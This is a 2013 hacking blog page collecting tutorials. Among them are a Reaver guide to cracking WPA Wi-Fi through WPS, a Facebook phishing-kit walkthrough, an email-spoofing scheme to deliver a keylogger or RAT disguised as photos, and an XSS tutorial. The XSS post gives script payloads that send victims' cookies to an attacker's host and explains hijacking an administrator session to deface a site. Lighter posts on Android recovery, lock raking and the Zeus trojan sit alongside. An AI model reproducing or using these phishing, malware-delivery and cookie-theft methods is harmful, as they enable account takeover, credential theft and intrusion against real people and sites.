Crack wifi WPA

Monday, July 29, 2013
Posted by Unknown
Tag :
Crack WPA
Your Wi-Fi network is your conveniently wireless gateway to the internet, and since you're not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how easy it is to crack a WEP password, you probably secure your network using the more bulletproof WPA security protocol.
Here's the bad news: A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.
In the first section of this post, I'll walk through the steps required to crack a WPA password using Reaver. You can follow along with either the video or the text below. After that, I'll explain how Reaver works, and what you can do to protect your network against Reaver attacks.
First, a quick note: As we remind often remind readers when we discuss topics that appear potentially malicious: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. The more you know, the better you can protect yourself.

What You'll Need

You don't have to be a networking wizard to use Reaver, the command-line tool that does the heavy lifting, and if you've got a blank DVD, a computer with compatible Wi-Fi, and a few hours on your hands, you've got basically all you'll need. There are a number of ways you could set up Reaver, but here are the specific requirements for this guide:
  • How to Crack a Wi-Fi Network's WPA Password with ReaverThe BackTrack 5 Live DVD. BackTrack is a bootable Linux distribution that's filled to the brim with network testing tools, and while it's not strictly required to use Reaver, it's the easiest approach for most users. Download the Live DVD from BackTrack's download page and burn it to a DVD. You can alternately download a virtual machine image if you're using VMware, but if you don't know what VMware is, just stick with the Live DVD. As of this writing, that means you should select BackTrack 5 R1 from the Release drop-down, select Gnome, 32- or 64-bit depending on your CPU (if you don't know which you have, 32 is a safe bet), ISO for image, and then download the ISO.
  • A computer with Wi-Fi and a DVD drive. BackTrack will work with the wireless card on most laptops, so chances are your laptop will work fine. However, BackTrack doesn't have a full compatibility list, so no guarantees. You'll also need a DVD drive, since that's how you'll boot into BackTrack. I used a six-year-old MacBook Pro.
  • A nearby WPA-secured Wi-Fi network. Technically, it will need to be a network using WPA security with the WPS feature enabled. I'll explain in more detail in the "How Reaver Works" section how WPS creates the security hole that makes WPA cracking possible.
  • A little patience. This is a 4-step process, and while it's not terribly difficult to crack a WPA password with Reaver, it's a brute-force attack, which means your computer will be testing a number of different combinations of cracks on your router before it finds the right one. When I tested it, Reaver took roughly 2.5 hours to successfully crack my password. The Reaver home page suggests it can take anywhere from 4-10 hours. Your mileage may vary.

Let's Get Crackin'

At this point you should have BackTrack burned to a DVD, and you should have your laptop handy.

Step 1: Boot into BackTrack

How to Crack a Wi-Fi Network's WPA Password with ReaverSEXPAND
To boot into BackTrack, just put the DVD in your drive and boot your machine from the disc. (Google around if you don't know anything about live CDs/DVDs and need help with this part.) During the boot process, BackTrack will prompt you to to choose the boot mode. Select "BackTrack Text - Default Boot Text Mode" and press Enter.
Eventually BackTrack will boot to a command line prompt. When you've reached the prompt, typestartxand press Enter. BackTrack will boot into its graphical interface.

Step 2: Install Reaver

Reaver has been added to the bleeding edge version of BackTrack, but it's not yet incorporated with the live DVD, so as of this writing, you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated with BackTrack by default.) To install Reaver, you'll first need to connect to a Wi-Fi network that you have the password to.
  1. Click Applications > Internet > Wicd Network Manager
  2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.
Now that you're online, let's install Reaver. Click the Terminal button in the menu bar (or click Applications > Accessories > Terminal). At the prompt, type:
apt-get update
And then, after the update completes:
apt-get install reaver
How to Crack a Wi-Fi Network's WPA Password with Reaver
If all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer. At this point, go ahead and disconnect from the network by opening Wicd Network Manager again and clicking Disconnect. (You may not strictly need to do this. I did just because it felt like I was somehow cheating if I were already connected to a network.)

Step 3: Gather Your Device Information, Prep Your Crackin'

In order to use Reaver, you need to get your wireless card's interface name, the BSSID of the router you're attempting to crack (the BSSID is a unique series of letters and numbers that identifies a router), and you need to make sure your wireless card is in monitor mode. So let's do all that.
Find your wireless card: Inside Terminal, type:
iwconfig
How to Crack a Wi-Fi Network's WPA Password with Reaver
Press Enter. You should see a wireless device in the subsequent list. Most likely, it'll be namedwlan0, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.
Put your wireless card into monitor mode: Assuming your wireless card's interface nameiswlan0, execute the following command to put your wireless card into monitor mode:
airmon-ng start wlan0
This command will output the name of monitor mode interface, which you'll also want to make note of. Most likely, it'll bemon0, like in the screenshot below. Make note of that.
How to Crack a Wi-Fi Network's WPA Password with Reaver
Find the BSSID of the router you want to crack: Lastly, you need to get the unique identifier of the router you're attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:
airodump-ng wlan0
(Note: Ifairodump-ng wlan0doesn't work for you, you may want to try the monitor interface instead—e.g.,airodump-ng mon0.)
You'll see a list of the wireless networks in range—it'll look something like the screenshot below:
How to Crack a Wi-Fi Network's WPA Password with Reaver
When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (it's the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column. (If it's WEP, use our previous guide to cracking WEP passwords.)
Now, with the BSSID and monitor interface name in hand, you've got everything you need to start up Reaver.

Step 4: Crack a Network's WPA Password with Reaver

Now execute the following command in the Terminal, replacingbssidandmoninterfacewith the BSSID and monitor interface and you copied down above:
reaver -i moninterface -b bssid -vv
For example, if your monitor interface wasmon0like mine, and your BSSID was8D:AE:9D:65:1F:B2(a BSSID I just made up), your command would look like:
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending. When Reaver's cracking has completed, it'll look like this:
How to Crack a Wi-Fi Network's WPA Password with Reaver
A few important factors to consider:Reaver worked exactly as advertised in my test, but it won't necessarily work on all routers (see more below). Also, the router you're cracking needs to have a relatively strong signal, so if you're hardly in range of a router, you'll likely experience problems, and Reaver may not work. Throughout the process, Reaver would sometimes experience a timeout, sometimes get locked in a loop trying the same PIN repeatedly, and so on. I just let it keep on running, and kept it close to the router, and eventually it worked its way through.
Also of note, you can also pause your progress at any time by pressing Ctrl+C while Reaver is running. This will quit the process, but Reaver will save any progress so that next time you run the command, you can pick up where you left off-as long as you don't shut down your computer (which, if you're running off a live DVD, will reset everything).

How Reaver Works

Now that you've seen how to use Reaver, let's take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It's a feature that exists on many routers, intended to provide an easy setup process, and it's tied to a PIN that's hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.
Read more details about the vulnerability at Sean Gallagher's excellent post on Ars Technica.

How to Protect Yourself Against Reaver Attacks

Since the vulnerability lies in the implementation of WPS, your network should be safe if you can simply turn off WPS (or, even better, if your router doesn't support it in the first place). Unfortunately, as Gallagher points out as Ars, even with WPS manually turned off through his router's settings, Reaver was still able to crack his password.
In a phone conversation, Craig Heffner said that the inability to shut this vulnerability down is widespread. He and others have found it to occur with every Linksys and Cisco Valet wireless access point they've tested. "On all of the Linksys routers, you cannot manually disable WPS," he said. While the Web interface has a radio button that allegedly turns off WPS configuration, "it's still on and still vulnerable.
So that's kind of a bummer. You may still want to try disabling WPS on your router if you can, and test it against Reaver to see if it helps.
You could also set up MAC address filtering on your router (which only allows specifically whitelisted devices to connect to your network), but a sufficiently savvy hacker could detect the MAC address of a whitelisted device and use MAC address spoofing to imitate that computer.
Double bummer. So what will work?
I have the open-source router firmware DD-WRT installed on my router and I was unable to use Reaver to crack its password. As it turns out, DD-WRT does not support WPS, so there's yet another reason to love the free router-booster. If that's got you interested in DD-WRT, check their supported devices list to see if your router's supported. It's a good security upgrade, and DD-WRT can also do cool things like monitor your internet usage, set up a network hard drive, act as a whole-house ad blocker, boost the range of your Wi-Fi network, and more. It essentially turns your $60 router into a $600 router.





























credit
What is a recovery?
Well recovery is something on android that basically allows you to flash zips which may contain apps, mods or custom roms. Every phone has a specific recovery for it which means you cant use a recovery that is for Galaxy Note II on Xperia Z.

What does flash mean?
Well flash is basically when you install something using a recovery it is called flash.

Which recovery should I install?
There are a lot of recoveries out there for your phone but for tutorials on this site we are going to be using "ClockWorkMod (CWM)" or "4ext Recovery" (btw i use 4ext). The Famous 3 recoveries are TeamWinRecoveryProject (TWRP), CWM , 4ext Recovery. But not every phone has these three recoveries available for them some have only CWM or TWRP or 4ext but famous phones such as Note II has all of them.
Downloads
You Just Need This Extract it.

How to install a recovery?
Well there are many different ways for installing recoveries on your phone but there are two most common ways

A) By ADB Fastboot:
This Method is only usable after you have found the recovery you want to install. A recovery is an .img file. 

1.Download The recovery .img you want to install.
2.Rename it to "recovery.img".
3.Copy "recovery.img" to the folder you extracted earlier
4. Now Press RightClick+Shift and then select Open Command Window Here.
5.Now just type "fastboot flash recovery recovery.img"
6.Done.

B) By Rom Manager For CWM:
This method is only usable if you have root.

1.Go to Googly Play
2.Search "Rom Manager'
3.Install it.
4.Open it and grant it root permissions.
5.Select Flash recovery and then your Device (If it doesn't show your device than your device doesn't have a  cwm recovery).
6.Done

C) By Goo Manager TWRP:
This is only usable with root.

1.Go to Googly Play
2.Search "Goo Manager'
3.Install it.
4.Open it and grant it root permissions.
5. Open it and hit menu - Install OpenRecoveryScript.
6.Select a recovery and hit install.
7.Done

D) By 4ext Recovery:
Only usable with root.

1. Go to http://4ext.net and download the free version
or
1.Go to Googly Play
2.Search "4ext Recovery''
3.Install it.
4.Open it and grant it root permissions.
6.Select "Online Upgrade" say yes if anything pops up.
7.It should detect your phone and if it detects wrong phone don't continue.
8.Select Recovery install it.
9.Done

How to pick a lock

Sunday, July 28, 2013
Posted by Unknown
How to pick a lock
Lock picking is considered by some to be the original "hack".  Long before computers there were locks and someone who wanted to manipulate them. The common misconception when picking a lock is that the process is difficult when, in actuality, it is quite simple. There are my methods to picking a lock but for this post we are going to go over the most basic method, “raking” or “scrubbing”.

Raking a lock is a simple, yet effective, way of manipulating the pins in a lock to open it without a key and can be achieved by the following steps:

  1. Insert the rake into the lock and make sure you are past the last pin. I like to push all the pins up so I can feel where the rake is placed in the lock. If you do not have a rake, one can be purchased from Bump My Lock 
  2. Insert the tension tool into the lock not to obstruct the rake. 
  3. Apply sight pressure on the tension tool in the direction you want to open the lock. This is the most difficult step in the process and will take some time to learn the right amount of tension. When teaching I like to use a rubber band on the end of the tension tool and pull just to when the rubber band starts to stretch.
  4. Try not and touch the walls of the key way and pull the rake straight out in one solid fast motion.
  5. If the lock does not open on the first try don't fret, insert the rake again, adjust your tension, and repeat the process.

Even though this is a simple way of picking a lock it will still take a good deal of practice and time to learn the skills and movements involved. One great tool for learning how to pick locks is the Lock Pick School in a Box and our Clear Practice Locks; both can be found here.


Zeus Virus

Posted by Unknown
Tag :
Zeus Virus
The 'Zeus Trojan Horse' Virus once again had a come back. According to a resource, it has an ability to drain your Bank accounts easily.

Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised with phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply check-out the video or product by clicking on such links. This way the virus will go viral.


Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own.

That fake page could then ask for your security information and some other important data that could be easily sold in black market.

According to many sources, perhaps it has been confirmed that those pages are being hosted by Russian Mafia (known as Russian Business Network as well).

About Zeus(Virus)


The virus is well-known for what it use to do. It was detected once back in 2007, and after that detection it started to spread online. The virus is well-designed so that if you would click on it, the possible and important data like Passwords and Bank Accounts can be stolen easily.

Does Facebook Took Action Against It?

Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it.

The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not satisfied well with their response.

Those who are using windows should stay much careful about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux are still safe of this virus.

Some countries like USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate  limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

How To Hack Facebook Using Phisher Method

Sunday, July 21, 2013
Posted by TheKingOfEmAll
Tag :
1. First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords  (login.php), You can download both the files from Here


2. To get the password click Here


3. After you download the files, Open login.php,with a note pad and search for the term www.enteryoursite.com and replace it with the site address where you want the victim  to be redirected ,finally save it



Note : This a very important step redirect the victim to a proper site other wise the  victim will get suspicious .In our case we are making fake face book login page so its  better to redirect the victim to www.facebook.com/careers


4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com


5. Now upload both the files (fake.html , login.php ) to your hosting account and send the fake.html(fake facbook login page) link to your victim

   Example :-
                         www.yoursite.110 mb.com/fake.html




6. Now when the victim enters all his credentials, like login name and password in our fake login page and  when he clicks login He will be redirected to site which we did in step 3



7. Now to see the victims id ,password, login to your hosting account "110mb.com " where you will see a new file "log.txt" .Open it to see the victims user id and the password


Leave a comment if you don't understand

What is Phishing

Posted by TheKingOfEmAll
Tag :

Phishing
Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

List of phishing techniques

Phishing
Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.
Spear phishing
Phishing attempts directed at specific individuals or companies have been termed spearphishing. Attackers may gather personal information about their target to increase their probability of success.
Clone phishing
A type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or Link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original.
This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.
Whaling
Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks.[36]

Link manipulation
Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

www.micosoft.com

www.mircosoft.com

www.verify-microsoft.com

instead of www.microsoft.com

Filter evasion
Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.
For Example:


Website forgery
Once a victim visits the phishing website, the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar.[44] This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL.
An attacker can even use flaws in a trusted website's own scripts against the victim.[46] These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.[47]
A Universal Man-in-the-middle (MITM) Phishing Kit, discovered in 2007, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.[48]
To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.[49]


How To Identify A Fraudulent E-mail?

Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”

Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”

These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”

Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.

“Click the link below to gain access to your account.”

HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.


So The Bottom Line To Defend From Phishing Attack Is

1. Never assume that an email is valid based on the sender’s email address.

2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.

3. An email from trusted organization will never contain attachments or software. 

4. Clicking on a link in an email is the most insecure way to get to your account

Ways to Hack An Email

Posted by TheKingOfEmAll
Tag :

I know most of you might be wondering to know how to hack email? You as the reader are most likely reading this because you want to hack into someone’s email account or catch a cheating spouse, girl/boy friend by gaining access to their email accounts. So read on to find out the real and working ways to hack any email and expose the truth behind the lies. 

Is it Possible to Hack Email?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come accross any website that claims to sell such softwares, I would advise you not to trust them.

2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.

3. With my experience of over 3 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work. 

The Following are the only Two working and Foolproof methods to hack any email.

1. Keylogging - Using a Keylogger

2. Phishing 

What is a Keylogger 

A keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press. Keyloggers are used in mainly used IT organizations to troubleshoot technical problems with computers and business networks. Keyloggers can also be used by a family (or business) to monitor the network usage of people without their direct knowledge. Finally, malicious individuals may use keyloggers on public computers to steal passwords or credit card information. 

What is Phishing 

Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as username, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website


To Know More Go To:


TUTORIAL: Hack anyone Facebook,email or PC..
This tutorial is like a spreading tutorial way basically. But more precise and powerful
REQUIREMENTS:-
1) A fully FUD server (SERVER BEING FUD is the most important part of the hack)
2) Patience
That's all...
Now coming to the hack...
there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting...
so read one and make your server fully fud...
Now do just as what i say:-
1) go to " http://emailattack.host22.com/emailspoof.php " and leave that tab open
2) now login to your facebook and copy the username of the person(FB username) you want
to hack
like this....
http://imageshack.us/photo/my-images/543/username.png
so basically the name after the http://www.facebook.com/ is the username...
in my example "RANDOM" is the username....
if the link shows url like "https://www.facebook.com/profile.php?id=100003721756694"
then you cannot use this method on them....
3) as you are the friend of the person you must know who he his/her best friend or just
close friend....
so basically get his email id attached to his Facebook like
http://imageshack.us/photo/my-images/152/contactw.png
[this can be hard if you don't have this person as your friend]
anyways you can ask his/her email id if you know him....
4)Now just open that spoofer tab and paste the info as follows:-
in Spoofed Email: the id you stolen from the contact info: ex: something@anymail.com
in Targets Email: username@facebook.com, ex: random@facebook.com
in Reply Email: same as spoofed email
in message title: hi or whatever
in message body : Hi check out my new pics uploaded here: "link of your key-logger,rat or
whatever"
HE/SHE WILL RECEIVE THAT MESSAGE FROM THE SPOOFED PERSON AND AS HE/SHE IS
HER CLOSE FRIEND SHE WILL DEFINITELY DOWNLOAD AND RUN IT
VICTIM WILL TAKE SOME TIME TO READ THE MESSAGE>DOWNLOAD THE FILE>RUN IT.
THAT'S WHY I SAID PATIENCE IS A REQUIREMENT ....
PRO-TIP:
1) If you are using the message from the example then i suggest you to download some of
the spoofed person(victim friend)
pictures and use icon-changer to change your server icon to JPEG icon and put all that pics
and your server to an .rar file and
upload it to the hosting site....
Lol,,,, no one sees the extension if you do this thing..
2) use rat's crew extension spoofer to change the extension to JPEG and change server icon
to JPEG too....
IT TOOK ME 2 HOURS TO WRITE THIS TUTORIAL . PLEASE TAKE 10 SECONDS TO SAY
THANKS.
I DONT KNOW WHO IS UNKNOWN1 BUT I LOVE HIM FOR HIS PHP
FILE....
THAT SITE I GAVE YOU IS MY PERSONAL... DOWNLOAD THAT
PHP AND MAKE YOUR OWN SITE IF IN SOME CASE MY WEBSITE
GETS DELETED.
I MADE THAT WEBSITE BY A TUTORIAL POSTED IN HF... IT IS
DELETED NOW SO I DON'T KNOW WHO WAS THE AUTHOR... BUT
ANYWAYS.. A BIG THANKS TO HIM.

XXS (cross site scripting tut)

Saturday, July 20, 2013
Posted by Unknown
Tag : ,

    Hello Guys Today i will write a Complete Tutorial on XSS.
    First Of All XSS is in 2 Types, Persistent and Non-Persistent type.
    For XSS we will use something called a Cookie Catcher.
    Question will be that why we would need someones else cookies?
    The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking.
    First go to a free hosting site like http://www.110mb.com or any other php hosting sites and register there. Then download this cookie catcher and upload it.
    Cookie Catcher: http://adf.ly/1I5oz
    What does the cookie catcher do?
    It grabs the user's:
    [*]Cookies
    [*]IP
    [*]Referral Link. Which Page is attached to that Link
    [*]Time And Date
    Get Vulnerable sites:
    Ok first we need sites that are vulnerable to XSS so it will work on them.
    To test it we will need to add a code after the link.
    I will use this site that many of you probably saw it before.
    Now for testing If a site is vulnerable or not you can add these codes:
    "><script>alert(document.cookie)</script>
    '><script>alert(document.cookie)</script>
    "><script>alert("Test")</script>
    '><script>alert("Test")</script>
    Or a new one which i found out myself in which you can inject HTML:
    "><body bgcolor="FF0000"></body>
    "><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>
    Then if we see a java script popup:
    Or if you used my testing and you saw the page's background go black or a page of google opens in that site it means its vulnerable to XSS attack.
    In the end, if your site is http://www.example.com
    The link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>
    Persistent XSS:
    In this method we will grab the slave's cookies with no suspection and completely stealth.
    Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
    Ok now lets go to this site: http://adf.ly/1I6ns
    Now test and see if the XSS vulnerable test work on it.
    It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type or submit it, add this:
    <script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
    and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
    so they wont suspect you.
    Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: http://www.example.com/cookie catcher.php
    The container of the cookies would be: http://www.example.com/cookies.html
    Now visit cookies.html and you would see the session of that cookie!
    Now there is another way for a cookie grabbing drive by, add this code and post it:
    <iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>
    Then post it in the forum or the comment box.
    Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a
    <iframe src="www.google.com"></iframe> and you will understand iframes more Smile
    ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.
    Non-Persistent XSS:
    Ok in this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:
    script>alert(document.cookie)</script>
    And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.
    I will use this link for this method: http://adf.ly/1I6ns
    Now in front of the search.php?search= add this:
    "><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
    Now go to http://www.spam.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one: GET FREE FAKE MAILER
    Now in the body just tell something fake like[/color]: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.
    Session Hijacking:
    Ok now you have the Admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The ; separates cookies from each other so first copy the code before the ; .
    Now go in that vulnerable website and clear the link. Instead of that link add this:
    Javascript:void(document.cookie="")
    or for an example:
    Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")
    Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator.
    So now go in your Admin Panel and upload your Deface Page.
    Good Luck. Now you have Hacked a Website with XSS.
Welcome to My Blog

Popular Post

Proud member of Internet Defense League

Member of The Internet Defense League
Powered by Blogger.

- Copyright © Toxic Cloud Hacking And Tricks -Ali Khans- Powered by Blogger - Designed by Muhammad Ali -